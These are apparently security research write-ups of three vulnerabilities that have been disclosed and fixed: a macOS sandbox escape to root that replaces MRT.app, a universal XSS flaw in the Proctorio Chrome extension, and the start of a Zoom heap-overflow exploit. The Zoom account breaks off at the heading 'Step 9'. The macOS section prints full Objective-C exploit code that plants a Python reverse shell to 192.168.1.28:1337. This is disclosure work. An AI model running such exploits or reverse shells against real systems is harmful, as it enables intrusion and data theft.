<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plistversion="1.0"><dict><key>Label</key><string>com.microsoft.teams.TeamsUpdaterDaemon</string><key>MachServices</key><dict><key>com.microsoft.teams.TeamsUpdaterDaemon</key><true/></dict><key>Program</key><string>/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon</string></dict></plist>
The following would work for privilege escalation:
Ask StorePrivilegedTaskService to move /Applications/Microsoft Teams.app somewhere else. Allowed, because the path of the directory contains .app.1
Move a new app bundle to /Applications/Microsoft Teams.app, which contains a malicious executable file at Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon.
Connect to the com.microsoft.teams.TeamsUpdaterDaemon Mach service.
However, a privilege escalation requiring a specific third-party application to be installed is not as convincing as a privilege escalation without this requirement, so we kept looking. The requirements are somewhat contradictory: typically anything bundled into an .app bundle runs as a normal user, not as root. In addition, the Signed System Volume on macOS Big Sur means changing any of the built-in applications is also impossible.
By an impressive and ironic coincidence, there is an application which is installed on a new macOS installation, not on the SSV and which runs automatically as root: MRT.app, the βMalware Removal Toolβ. Apple has implemented a number of anti-malware mechanisms in macOS. These are all updateable without performing a full system upgrade because they might be needed quickly. This means in particular that MRT.app is not on the SSV. Most malware is removed by signature or hash checks for malicious content, MRT is the more heavy-handed solution when Apple needs to add code for performing the removal.
Although MRT.app is in an app bundle, it is not in fact a real application. At boot, MRT is run as root to check if any malware needs removing.
Our complete attack follows the following steps, from sandboxed application to code execution as root:
Create a new application bundle bar.appdownload/Icon/foo.app in the temporary directory of our sandboxed application containing a malicious executable.
Load the AppStoreDaemon.framework framework and connect to the StorePrivilegedTaskService XPC service.
Ask StorePrivilegedTaskService to change the quarantine attribute for the executable file to allow it to launch without a prompt.
Ask StorePrivilegedTaskService to move /Library/Apple/System/Library/CoreServices/MRT.app to a different location.
Ask StorePrivilegedTaskService to move bar.appdownload/Icon/foo.app from the temporary directory to /Library/Apple/System/Library/CoreServices/MRT.app.
Wait for a reboot.
See the full function here:
/// The bar.appdownload/Icon part in the path is needed to create files where both the sandbox profile of StorePrivilegedTaskService and the Mac AppStore sandbox of this process allow acccess.
NSString*path=[NSTemporaryDirectory()stringByAppendingPathComponent:@"bar.appdownload/Icon/foo.app"];NSFileManager*fm=[NSFileManagerdefaultManager];NSError*error=nil;/// Cleanup, if needed.
[fmremoveItemAtPath:patherror:nil];[fmcreateDirectoryAtPath:[pathstringByAppendingPathComponent:@"Contents/MacOS"]withIntermediateDirectories:TRUEattributes:nilerror:&error];assert(!error);/// Create the payload. This example uses a Python reverse shell to 192.168.1.28:1337.
[@"#!/usr/bin/env python\n\nimport socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.1.28\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);"writeToFile:[pathstringByAppendingPathComponent:@"Contents/MacOS/MRT"]atomically:TRUEencoding:NSUTF8StringEncodingerror:&error];assert(!error);/// Make the payload executable
[fmsetAttributes:@{NSFilePosixPermissions:[NSNumbernumberWithShort:0777]}ofItemAtPath:[pathstringByAppendingPathComponent:@"Contents/MacOS/MRT"]error:&error];assert(!error);/// Load the framework, so the XPC service can be resolved.
[[NSBundlebundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"]load];NSXPCConnection*conn=[[NSXPCConnectionalloc]initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];conn.remoteObjectInterface=[NSXPCInterfaceinterfaceWithProtocol:@protocol(StorePrivilegedTaskInterface)];[connresume];/// The new file is now quarantined, because this process created it. Change the quarantine flag to something which is allowed to run.
/// Another option would have been to use the `-writeAssetPackMetadata:toURL:replyHandler` method to create an unquarantined file.
[conn.remoteObjectProxysetExtendedAttributeAtPath:[pathstringByAppendingPathComponent:@"Contents/MacOS/MRT"]name:@"com.apple.quarantine"value:[@"00C3;60018532;Safari;"dataUsingEncoding:NSUTF8StringEncoding]withReplyHandler:^(NSError*result){NSLog(@"%@",result);assert(result==nil);srand((unsignedint)time(NULL));/// Deleting this directory is not allowed by the sandbox profile of StorePrivilegedTaskService: it can't modify the files inside it.
/// However, to move a directory, the permissions on the contents do not matter.
/// It is moved to a randomly named directory, because the service refuses if it already exists.
[conn.remoteObjectProxymoveAssetPackAtPath:@"/Library/Apple/System/Library/CoreServices/MRT.app/"toPath:[NSStringstringWithFormat:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT%d.app/",rand()]withReplyHandler:^(NSError*result){NSLog(@"Result: %@",result);assert(result==nil);/// Move the malicious directory in place of MRT.app.
[conn.remoteObjectProxymoveAssetPackAtPath:pathtoPath:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT.app/"withReplyHandler:^(NSError*result){NSLog(@"Result: %@",result);/// At launch, /Library/Apple/System/Library/CoreServices/MRT.app/Contents/MacOS/MRT -d is started. So now time to wait for that...
}];}];}];
Fix
Apple has pushed out a fix in the macOS 11.4 release. They implemented all 3 of the recommended changes:
Check the entitlements of the process initiating the connection to StorePrivilegedTaskService.
Tightened the sandboxing profile of StorePrivilegedTaskService.
The path traversal vulnerabilities for the subdirectory check were fixed.
This means that the vulnerability is not just fixed, but reintroducing it later is unlikely to be exploitable again due to the improved sandboxing profile and path checks. We reported this vulnerability to Apple on January 19th, 2021 and a fix was released on May 24th, 2021.
In February of 2020 the first person in The Netherlands tested positive for COVID-19, which quickly led to a national lockdown. After that universities had to close for physical lectures. This meant that universities quickly had to switch to both online lectures and tests.
For universities this posed a problem: how are you going to prevent students from cheating if they take the test in a location where you have no control nor visibility? In The Netherlands most universities quickly adopted anti-cheating software that students were required to install in order to be able to take a test. This to the dissatisfaction of students, who found this software to be too invasive of their privacy. Students were required to run monitoring software on their personal device that would monitor their behaviour via the webcam and screen recording.
The usage of this software was covered by national media on a regular basis, as students fought to disallow universities to use this kind of software. This led to several court cases were universities had to defend the usage of this software. The judge ended up ruling in favour of the universities.
Proctorio is such monitoring software and it is used by most Dutch universities. For students this comes as a Google Chrome extension. And indeed, the extension has quite an extensive list of permissions. This includes the recording of your screen and permission to read and change all data on the websites that you visit.
All this was reason enough for us to have a closer look to this much debated software. After all, vulnerabilities in this extension could have considerable privacy implications for students with this extension installed. In the end, we found a severe vulnerability that leads to a Universal Cross-Site Scripting vulnerability, which could be triggered by any website. This means that a malicious website visited by the user could steal or modify any data from every website, if the victim had the Proctorio extension installed. The vulnerability has since been fixed by Proctorio. As Chrome extensions are updated automatically, this requires no actions from Proctorio users.
Background
Chrome extensions consist of two parts. A background page with JavaScript is the core of the extension, which has the permissions granted to the extension. It can add scripts to currently open tabs, which are known as content scripts. Content scripts have access to the DOM, but use a separate JavaScript environment. Content scripts do not have the full permissions of the background page, but their ability to communicate with the background page makes them more powerful than the JavaScript on a page itself.
Vulnerability details
The Proctorio extension inspects network traffic of the browser. When requests are observed for paths that match supported test taking websites, it injects some content scripts into the page. It tries to determine if the user is using a Proctorio-enabled test by retrieving details of the test using specific API endpoints used by the supported test websites.
Once a test is started, a toolbar is added with a number of buttons allowing a student to manage Proctorio. This includes a button to open a calculator, which supports some simple mathematical calculations.
When the user clicks the β=β button, a function is called in the content script to compute the result. The computation is performed by calling the eval() function in JavaScript, in the minified JavaScript this is in the function named ghij. The function eval() is a dangerous, as it can execute arbitrary JavaScript, not just mathematical expressions. The function ghij does not check that the input is actually a mathematical expression.
Because the calculator is added to DOM of the page activating Proctorio, JavaScript on the page can automatically enter an expression for the calculator and then trigger the evaluation. This allows the webpage to execute code inside the content script. From the context of the content script, the page can then send messages to the background page that are handled as messages from the content script. Using a combination of messages, we found we could trigger UXSS.
(In our Zoom exploit, the calculator was opened just to demonstrate our ability to launch arbitrary applications, but in this case we actually exploit the calculator itself!)
Exploitation to UXSS
By using one of a number of specific paths in the URL, adding certain DOM elements and sending specific responses to a small number of API requests Proctorio can be activated by any website without user approval. By pretending to be in demo mode and automatically activating the demo, the page can start a complete Proctorio session. This happens completely automatically, without user interaction. Then, the page can open the calculator and use the exploit to execute code in the content script.
The content script itself does not have the full permissions of the browser extension, but it does have permission to send messages to the background page. The JavaScript on the background page supports a large number of different messages, each identified by a number indicated by the first element of the array which is the message.
The first thing that can be done using that is to download a URL while bypassing the Same Origin Policy. There are a number of different message types that will download a URL and return the result. For example, message number 502:
(The # is used here to make sure anything which is appended after it is not sent to the server.)
This downloads the URL in the session of the current user and returns the result to the page. This could be used to, for example, retrieve all of the userβs email messages if they are signed in to their webmail if it uses cookies for authentication. Normally, this is not allowed unless the URL uses the same origin, or the response specifically allows it using Cross-Origin Resource Sharing (CORS).
A CORS bypass is already a serious vulnerability, but it can be extended further. A universal cross-site scripting attack can be performed in the following way.
Some messages trigger the adding of new content scripts to the tab. Sometimes, variables need to be passed to those scripts. Most of the time those variables are escaped correctly, but when using a message with number 25, the argument is not escaped. The minified code for this function is:
This function c0693() contains a function which is converted to a string. This inner function not executed by the background page, but by converting it to a string it takes the text of this function, which is then called using the argument a in the content script. Note that the last line in this function does not escape that value. This means that it is possible to include JavaScript, which is then executed in the context of the content script in the same tab that sent the message.
Evaluating JavaScript in the same tab again is not very useful on its own, but it is possible to make the tab switch origins in between sending the message and the execution of the new script. This is because the call to executeScript specifies the tab id, which doesnβt change when navigating to a different page.
Message with number 507 uses a synchronous XMLHttpRequest, which means that the JavaScript of the entire background page will be blocked while waiting for the HTTP response. By sending a request to a URL which is set up to always take 5 seconds to respond, then immediately sending a message with number 25 and then changing the location of the tab, the JavaScript from the 25 message is executed on a new page instead.
For example, the following will allow the https://computest.nl origin to execute an alert on the https://example.com origin:
The URL https://computest.nl/sleep is used here as an example of a URL that takes 5 seconds to respond.
The video below demonstrates the attack:
Finally, the user could notice the fact that Proctorio is enabled based on the color of the Proctorio icon in the browser bar, which turns green once it activates. However, sending a message [32, false] turns this icon grey again, even though Proctorio is still active. The malicious webpage could quickly turn the icon grey again after exploiting the content script, which means the user only has a few milliseconds to notice the attack.
What can we do with UXSS?
An important security mechanism of your browser is called the Same Origin Policy (SOP). Without SOP surfing the web would be very insecure, as websites would then be able to read data from other domains (origins). It is the most important security control the browser has to enforce.
With an Universal XSS vulnerability a malicious webpage can run JavaScript on other pages, regardless of the origin. This makes this a very powerful primitive for an attacker to have in a browser. The video below shows that we can use this primitive to obtain a screenshot from the webcam and to download a GMail inbox, using our exploit from above.
For stealing GMail data we just need to inject some JavaScript that copies the content of the inbox and sends it to a server under our control. For getting a webcam screenshot we rely on the fact that most people will have allowed certain legitimate domains to have webcam access. In particular, users of Proctorio who had to enable their webcam for a test will have given the legitimate test website permission to use the webcam. We use UXSS to open a tab of such a domain and inject some JavaScript that grabs a webcam screenshot. In the example we rely on the fact that the victim has previously granted the domain zoom.us webcam access. This can be any page, but due to the pandemic we think that zoom.us would be a pretty safe bet. (The stuffed animal is called Dikkie Dik, from a well known Dutch childrenβs picture book.)
Disclosure
We contacted Proctorio with our findings on June 18th, 2021. They replied back within hours thanking us for our findings. Within a week (on June 25th) they reported that the vulnerability was fixed and a new version was pushed to the Google Chrome Web Store. We verified that the vulnerability was fixed on August 3rd. Since Google Chrome automatically updates installed extensions, this requires no further action from the end-user. At the time of writing version 1.4.21183.1 is the latest version.
In the fixed version, an iframe is used to load a webpage for the calculator, meaning exploiting this vulnerability is no longer possible.
Installing software on your (personal) device, either for work or for study always adds new risks end-users should be aware of. In general it is always wise to deinstall software as soon as you no longer need it, in order to mitigate this risk. In this situation one could disable the Proctorio plugin, to avoid it being accessible when you are not taking a test.
On April 7 2021, Thijs Alkemade and Daan Keuper demonstrated a zero-click remote code execution exploit in the Zoom video client during Pwn2Own 2021. Now that related bugs have been fixed for all users (see ZDI-21-971 and ZSB-22003) we can safely detail the bugs we exploited and how we found them. In this blog post, we wanted to not only explain the bugs and our exploit, but provide a log of our entire process. We hope that detailing our process helps others with similar research in the future. While we had profound experience with exploiting memory corruption vulnerabilities on many platforms, both of us had zero experience with this on Windows. So during this project we had a lot to learn about the Windows internals.
Wow - with just 10 seconds left of their 2nd attempt, Daan Keuper and Thijs Alkemade were able to demonstrate their code execution via Zoom messenger. 0 clicks were used in the demo. They're off to the disclosure room for details. #Pwn2Ownpic.twitter.com/qpw7yIEQLS
This is going to be quite a long post. So before we dive into the details, now that the vulnerabilities have been fixed, below you can see a full run of the exploit (now fixed) in action. The post hereafter will explain in detail every step that took place during the exploitation phase and how we came to this solution.
Announcement
Participating in Pwn2Own was one of the initial goals we had for our new research department, Sector 7. When we made our plans last year, we didnβt expect that it would be as soon as April 2021. In recent years the Vancouver edition in spring has focused on browsers, local privilege escalation and virtual machines. The software in these categories has received a lot of attention to security, including many specific defensive layers. Weβd also be competing with many others who may have had a full year to prepare their exploits.
To our surprise, on January 27th Pwn2Own was officially announced with a new category: βEnterprise Communicationsβ, featuring Microsoft Teams and the Zoom Meetings client. These tools have become incredibly important due to the pandemic, so it makes sense for those to be added to Pwn2Own. We realized that either of these would be a much better target for us, because most researchers would have to start from scratch.
Announcing #Pwn2Own Vancouver 2021! Over $1.5 million available across 7 categories. #Tesla returns as a partner, and we team up with #Zoom for the new Enterprise Communications category. Read all the details at https://t.co/suCceKxI0T#P2O
We had not yet decided between Zoom and Microsoft Teams. We made a guess for what type of vulnerability we would expect could lead to RCE in those applications: Microsoft Teams is developed using Electron with a few native libraries in C++ (mainly for platform integration). Electron apps are built using HTML+JavaScript with a Chromium runtime included. The most likely path for exploitation would therefore be a cross-site scripting issue, possibly in combination with a sandbox escape. Memory corruption could be possible, but the number of native libraries is small. Zoom is written in C++, meaning the most likely vulnerability class would be memory corruption. Without any good data on which would be more likely, we decided on Zoom, simply because we like doing research on memory corruption more than XSS.
Step 1: What is this βZoomβ?
Both of us had not used Zoom much (if at all). So, our very first step was to go through the application thoroughly, focused on identifying all ways you can send something to another user, as that was the vector we wanted for the attack. That turned out to be quite a list. Most users will mainly know the video chat functionality, but there is also a quite full featured chat client included, with the ability to send images, create group chats, and many more. Within meetings, thereβs of course audio and video, but also another way to chat, send files, share the screen, etc. We made a few premium accounts too, to make sure we saw as much as possible of the features.
Step 2: Network interception
The next step was to get visibility in the network communication of the client. We would need to see the contents of the communication in order to be able to send our own malicious traffic. Zoom uses a lot of HTTPS requests (often with JSON or protobufs), but the chat connection itself uses a XMPP connection. Meetings appear to have a number of different options depending on what the network allows, the main one a custom UDP based protocol. Using a combination of proxies, modified DNS records, sslsplit and a new CA certificate installed in Windows, we were able to inspect all traffic, including HTTP and XMPP, in our test environment. We initially focused on HTTP and XMPP, as the meeting protocol seemed like a (custom) binary protocol.
Step 3: Disassembly
The following step was to load the relevant binaries in our favorite disassemblers. Because we knew we wanted a vulnerability exploitable from another user, we started with trying to match the handling of incoming XMPP stanzas (a stanza is an XMPP element you can send to another user) to the code. We found that the XMPP XML stream is initially parsed by XmppDll.dll. This DLL is based on the C++ XMPP library gloox. This meant that reverse-engineering this part was quite easy, even for the custom extensions Zoom added.
However, it became quite clear that we werenβt going to find any good vulnerabilities here. XmppDll.dll only parses incoming XMPP stanzas and copies the XML data to a new C++ object. No real business logic is implemented here, everything is passed to a callback in a different DLL.
In the next DLLβs we hit a bit of a wall. The disassembly of the other DLLβs was almost impossible to get through due to a large number of calls to vtables and other DLLβs. Almost nothing was available to give us some grip on the disassembled code. The main reason for that was that most DLLβs do no logging at all. Logs are of course useful for dynamic analysis, but also for static analysis they can be very useful, as they often reveal function and variable names and give information about what checks are performed. We found that Zoom had generated a log of the installation, but while running it nothing was logged at all.
After reporting a problem through the desktop client, the Support team may ask you to install a special troubleshooting package of Zoom to log more information about your issue and help Zoom engineers investigate the issue. After recreating the issue, these files need to be sent to your Zoom support agent via your existing ticket. The troubleshooting version does not allow Zoom support or engineering access to your computer, but rather just gathers more information about your specific issue.
This suggests that logging is compile-time disabled, but special builds with logging do exist. They are only given out by support to debug a specific issue. For bug bounties any form of social engineering is usually banned. While the Pwn2Own rules donβt mention it, we did not want to antagonize Zoom about this. Therefore, we decided to ask for this version. As Zoom was sponsoring Pwn2Own, we thought they might be willing to give us that client if we asked through ZDI, so we did just that. It is not uncommon for companies to offer specific tools for researchers to help in their research, such as test units Tesla can give to interested researchers.
Sadly, Zoom turned this request down - we donβt know why. But before we could fall back to any social engineering, we found something else that was almost as good. It turns out Zoom has a SDK that can be used to integrate the Zoom meeting functionality in other applications. This SDK consists of many of the same libraries as the client itself, but in this case these DLL files do have logging present. It doesnβt have all of them (some UI related DLLβs are missing), but it has enough to get a good overview of the functionality of the core message handling.
The logging also revealed file names and function names, as can be seen in this disassembled example:
With this we could start looking for bugs in earnest. Specifically, we were looking for any kind of memory corruption vulnerability. These often occur during parsing of data, but in this case that was not a likely vector for the XMPP connection. A well known library is used for XMPP and we would also need to get our payload through the server, so any invalid XML would not get to the other client. Many operations using strings are using C++ std::string objects, which meant that buffer overflows due to mistakes in length calculations are also not very likely.
About 2 weeks after we started this research, we noticed an interesting thing about the base64 decoding that was happening in a couple of places:
EVP_DecodeBlock is the OpenSSL function that handles base64-decoding. Base64 is an encoding that turns three bytes into four characters, so decoding results in something which is always 3/4 of the size of the input (ignoring any rounding). But instead of allocating something of that size, this code is allocating a buffer which is four times larger than the input buffer (shifting left twice is the same as multiplying by four). Allocating something too big is not an exploitable vulnerability (maybe if you trigger an integer overflow, but thatβs not very practical), but what it did show was that when moving data from and to OpenSSL incorrect calculations of buffer sizes might be present. Here, std::string objects will need to be converted to C char* pointers and separate length variables. So we decided to focus on the calling of OpenSSL functions from Zoomβs own code for a while.
Step 5: The Bug
Zoomβs chat functionality supports a setting named βAdvanced chat encryptionβ (only available for paying users). This functionality has been around for a while. By default version 2 is used, but if a contact sends a message using version 1 then it is still handled. This is what we were looking at, which involves a lot of OpenSSL functions.
Version 1 works more or less like this (as far as we could understand from the code):
The sender sends a message encrypted using a symmetric key, with a key identifier indicating which message key was used.
<messagefrom="[email protected]/ZoomChat_pc"to="[email protected]"id="85DC3552-56EE-4307-9F10-483A0CA1C611"type="chat"><body>[This is an encrypted message]</body><thread>gloox{BFE86A52-2D91-4DA0-8A78-DC93D3129DA0}</thread><activexmlns="http://jabber.org/protocol/chatstates"/><ze2e><tp><send>[email protected]</send><sres>ZoomChat_pc</sres><scid>{01F97500-AC12-4F49-B3E3-628C25DC364E}</scid><ssid>[email protected]</ssid><cvid>zc_{10EE3E4A-47AF-45BD-BF67-436793905266}</cvid></tp><actiontype="SendMessage"><msg><message>/fWuV6UYSwamNEc40VKAnA==</message><iv>sriMTH04EXSPnphTKWuLuQ==</iv></msg><xkey><owner>{01F97500-AC12-4F49-B3E3-628C25DC364E}</owner></xkey></action><appv="0"/></ze2e><zmtaskfeature="35"><nos>You have received an encrypted message.</nos></zmtask><zmextexpire_t="1680466611000"t="1617394611169"><fromn="John Doe"e="[email protected]"res="ZoomChat_pc"/><to/><visible>true</visible></zmext></message>
The recipient checks to see if they have the symmetric key with that key identifier. If not, the recipientβs client automatically sends a RequestKey message to the other user, which includes the recipientβs X509 certificate in order to encrypt the message key (<pub_cert>).
The sender responds to the RequestKey message with a ResponseKey message. This contains the senderβs X509 certificate in <pub_cert>, an <encoded> XML element, which contains the message key encrypted using both the senderβs private key and the recipientβs public key, and a signature in <signature>.
The way the key is encrypted has two options, depending on the type of key used by the recipientβs certificate. If it uses a RSA key, then the sender encrypts the message key using the public key of the recipient and signs it using their own private RSA key.
The default, however, is not to use RSA but to use an elliptic curve key using the curve P-521. Algorithms for encryption using elliptic curve keys do not exist (as far as we know). So instead of encrypting directly, elliptic curve Diffie-Helman is used using both usersβ keys to obtain a shared secret. The shared secret is split into a key and IV to encrypt the message key data with AES. This is a common approach for encrypting data when using elliptic curve cryptography.
When handling a ResponseKey message, a std::string of a fixed size of 1024 bytes was allocated for the decrypted result. When decrypting using RSA, it was properly validated that the decryption result would fit in that buffer. When decrypting using AES, however, that check was missing. This meant that by sending a ResponseKey message with an AES-encrypted <encoded> element of more than 1024 bytes, it was possible to overflow a heap buffer.
The following snippet shows the function where the overflow happens. This is the SDK version, so with the logging available. Here, param_1[0] is the input buffer, param_1[1] is the input bufferβs length, param_1[2] is the output buffer and param_1[3] the output buffer length. This is a large snippet, but the important part of this function is that param_1[3] is only written to with the resulting length, it is not read first. The actual allocation of the buffer happens in a function a few steps earlier.
undefined4__fastcallAESDecode(undefined4*param_1,undefined4*param_2){charcVar1;intiVar2;undefined4uVar3;intiVar4;LogMessage*this;intextraout_EDX;intiVar5;LogMessagelocal_180[176];LogMessagelocal_d0[176];intlocal_20;undefined4*local_1c;intlocal_18;intlocal_14;undefined4local_8;undefined4uStack4;uStack4=0x170;local_8=0x101ba696;iVar5=0;local_14=0;local_1c=param_2;cVar1=FUN_101ba34a();if(cVar1=='\0'){return1;}if((*(uint*)(extraout_EDX+4)<0x20)||(*(uint*)(extraout_EDX+0xc)<0x10)){iVar5=logging::GetMinLogLevel();if(iVar5<2){logging::LogMessage::LogMessage(local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",0x1d6,1);local_8=0;local_14=1;uVar3=log_message(iVar5+8,"[AESDecode] Failed. Key len or IV len is incorrect."," ");log_message(uVar3);logging::LogMessage::~LogMessage(local_d0);return1;}return1;}local_14=param_1[2];local_18=0;iVar2=EVP_CIPHER_CTX_new();if(iVar2==0){return0xc;}local_20=iVar2;EVP_CIPHER_CTX_reset(iVar2);uVar3=EVP_aes_256_cbc(0,*local_1c,local_1c[2],0);iVar4=EVP_CipherInit_ex(iVar2,uVar3);if(iVar4<1){iVar2=logging::GetMinLogLevel();if(iVar2<2){logging::LogMessage::LogMessage(local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",0x1e8,1);iVar5=2;local_8=1;local_14=2;uVar3=log_message(iVar2+8,"[AESDecode] EVP_CipherInit_ex Failed."," ");log_message(uVar3);}LAB_101ba758:if(iVar5==0)gotoLAB_101ba852;this=local_d0;}else{iVar4=EVP_CipherUpdate(iVar2,local_14,&local_18,*param_1,param_1[1]);if(iVar4<1){iVar2=logging::GetMinLogLevel();if(iVar2<2){logging::LogMessage::LogMessage(local_d0,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",0x1f0,1);iVar5=4;local_8=2;local_14=4;uVar3=log_message(iVar2+8,"[AESDecode] EVP_CipherUpdate Failed."," ");log_message(uVar3);}gotoLAB_101ba758;}param_1[3]=local_18;iVar4=EVP_CipherFinal_ex(iVar2,local_14+local_18,&local_18);if(0<iVar4){param_1[3]=param_1[3]+local_18;EVP_CIPHER_CTX_free(iVar2);return0;}iVar2=logging::GetMinLogLevel();if(iVar2<2){logging::LogMessage::LogMessage(local_180,"c:\\ZoomCode\\client_sdk_2019_kof\\Common\\include\\zoom_crypto_util.h",0x1fb,1);iVar5=8;local_8=3;local_14=8;uVar3=log_message(iVar2+8,"[AESDecode] EVP_CipherFinal_ex Failed."," ");log_message(uVar3);}if(iVar5==0)gotoLAB_101ba852;this=local_180;}logging::LogMessage::~LogMessage(this);LAB_101ba852:EVP_CIPHER_CTX_free(local_20);return0xc;}
Side note: we donβt know the format of what the <encoded> element would normally contain after decryption, but from our understanding of the protocol we assume it contains a key. It was easy to initiate the old version of the protocol against a new client. But to have a legitimate client initiate requires an old version of the client, which appears to be malfunctioning (it can no longer log in).
We were about 2 weeks into our research and we had found a buffer overflow we could trigger remotely without user interaction by sending a few chat messages to a user who had previously accepted external contact request or is currently in the same multi-user chat. This was looking promising.
Step 6: Path to exploitation
To build an exploit around it, it is good to first mention some pros and cons of this buffer overflow:
Pro: The size is not directly bounded (implicitly by the maximum size of an XMPP packet, but in practice this is way more than needed).
Pro: The contents are the result of decrypting the buffer, so this can be arbitrary binary data, not limited to printable or non-zero characters.
Pro: It triggers automatically without user interaction (as long as the attacker and victim are contacts).
Con: The size must be a multiple of the AES block size, 16 bytes. There can be padding at the end, but even when padding is present it will still overwrite the data up to a full block before removing the padding.
Con: The heap allocation is of a fixed (and quite large) size: 1040 bytes. (The backing buffer of a std::string on Windows has up to 16 extra bytes for some reason.)
Con: The buffer is allocated and then while handling the same packet used for the overflow. We can not place the buffer first, allocate something else and then overflow.
We did not yet have a full plan for how to exploit this, but we expected that we would most likely need to overwrite a function pointer or vtable in an object. We already knew OpenSSL was used, and it uses function pointers within structs extensively. We could even create a few already during the later handling of ResponseKey messages. We investigated this, but it quickly turned out to be impossible due to the heap allocator in use.
Step 7: Understanding the Windows heap allocator
To implement our exploit, we needed to fully understand how the heap allocator in Windows places allocations. Windows 10 includes two different heap allocators: the NT heap and the Segment Heap. The Segment Heap is new in Windows 10 and only used for specific applications, which donβt include Zoom, so the NT Heap was what is used. The NT Heap has two different allocators (for allocations less than about 16 kB): the front-end allocator (known as the Low-Fragment Heap or LFH) and the back-end allocator.
Before we go into detail for how those two allocators work, weβll introduce some definitions:
Block: a memory area which can be returned by the allocator, either in use or not.
Bucket: a group of blocks handled by the LFH.
Page: a memory area assigned by the OS to a process.
By default, the back-end allocator handles all allocations. The best way to imagine the back-end allocator is as a sorted list of all free blocks (the freelist). Whenever an allocation request is received for a specific size, the list is traversed until a block is found of at least the requested size. This block is removed from the list and returned. If the block was bigger than the requested size, then it is split and the remainder is inserted in the list again. If no suitable blocks are present, the heap is extended by requesting a new page from the OS, inserting it as a new block at the appropriate location in the list. When an allocation is freed, the allocator first checks if the blocks before and after it are also free. If one or both of them are then those are merged together. The block is inserted into the list again at the location matching its size.
The following video shows how the allocator searches for a block of a specific size (orange), returns it and places the remainder back into the list (green).
The back-end allocator is fully deterministic: if you know the state of the freelist at a certain time and the sequence of allocations and frees that follow, then you can determine the new state of the list. There are some other useful properties too, such as that allocations of a specific size are last-in-first-out: if you allocate a block, free it and immediately allocate the same size, then you will always receive the same address.
The front-end allocator, or LFH, is used for allocations for sizes that are used often to reduce the amount of fragmentation. If more than 17 blocks of a specific size range are allocated and still in use, then the LFH will start handling that specific size from then on. LFH allocations are grouped in buckets each handling a range of allocation sizes. When a request for a specific size is received, the LFH checks the bucket most recently used for an allocation of that size if it still has room. If it does not, it checks if there are any other buckets for that size range with available room. If there are none, a new bucket is created.
No matter if the LFH or back-end allocator is used, each heap allocation (of less than 16 kB) has a header of eight bytes. The first four bytes are encoded, the next four are not. The encoding uses a XOR with a random key, which is used as a security measure against buffer overflows corrupting heap metadata.
For exploiting a heap overflow there are a number of things to consider. The back-end allocator can create adjacent allocations of arbitrary sizes. On the LFH, only objects in the same range are combined in a bucket, so to overwrite a block from a different range you would have to make sure two buckets are placed adjacent. In addition, which free slot from a bucket is used is randomized.
For these reasons we focused initially on the back-end allocator. We quickly realized we couldnβt use any of the OpenSSL objects we found previously: when we launch Zoom in a clean state (no existing chat history), all sizes up to around 700 bytes (and many common sizes above it too) would already be handled by the LFH. It is impossible to switch a specific size back from the LFH to the back-end allocator. Therefore, the OpenSSL objects we identified initially would be impossible to allocate after our overflowing block, as they were all less than 700 bytes so guaranteed to be placed in a LFH bucket.
This meant we had to search more thoroughly for objects of larger sizes in which we might be able to overwrite a function pointer or vtable. We found that one of the other DLLβs, zWebService.dll, includes a copy of libcurl, which gave us some extra source code to analyze. Analyzing source code was much more efficient than having to obtain information about a C++ objectβs layout from a decompiler. This did give us some interesting objects to overflow that would not automatically be on the LFH.
Step 8: Heap grooming
In order to place our allocations, we would need to do some extensive heap grooming. We assumed we needed to follow the following procedure:
Allocate a temporary object of 1040 bytes.
Allocate the object we want to overwrite after it.
Free the object of 1040 bytes.
Perform the overflow, hopefully at the same address as the 1040 byte object.
In order to do this, we had to be able to make an allocation of 1040 bytes which we could free at a precise later time. But even more importantly, for this to work we would also need to fill up many holes in the freelist so our two objects would end up adjacent. If we want to allocate the objects directly adjacent, then in the first step there needs to be a free block of size 1040 + x, with x the size of the other object. But this means that there must not be any other allocations of size between 1040 and 1040 + x, otherwise that block would be used instead. This means there is a pretty large range of sizes for which there must not be any free blocks available.
To make arbitrary sized allocations, we stayed close to what we already knew. As we mentioned, if you send an encrypted message with a key identifier the other user does not yet have, then it will request that key. We noticed that this key identifier remained in a std::string in memory, likely because it was waiting for a response. It could be an arbitrary large size, so we had a way to make an allocation. It is also possible to revoke chat messages in Zoom, which would also free the pending key request. This gave us a primitive for allocating and freeing a specific size block, but it was quite crude: it would always allocate 2 copies of that string (for some reason), and in order to handle a new incoming message it would make quite a few temporary copies.
We spent a lot of time making allocations by sending messages and monitoring the state of the freelist. For this, we wrote some Frida scripts for tracking allocations, printing the freelist and checking the LFH status. These things can all be done by WinDBG, but we found it way too slow to be of use. There was one nice trick we could use: if specific allocations could get in the way of our heap grooming, then we could trigger the LFH for that size to make sure it would no longer affect the freelist by making the client perform at least 17 allocations of that size.
We spent a lot of time on this, but we ran into a problem. Sometimes, randomly, our allocation of 1040 bytes would already be placed on the LFH, even if we launched the application in a clean state. At first, we accepted this risk: a chance of around 25% to fail is still quite acceptable for the 3 attempts in Pwn2Own. But the more concrete our grooming became, the more additional objects and sizes we needed to use, such as for the objects from libcurl we might want to overwrite. With more sizes, it would get more and more likely that at least of one of them would be handled by the LFH already, completely breaking our exploit. We werenβt very keen on participating with a exploit that had already failed 75% of the time by the time the application had finished launching. We had spent a few weeks on trying to gain control over this, but eventually decided to try something else.
Step 9: To the LFH
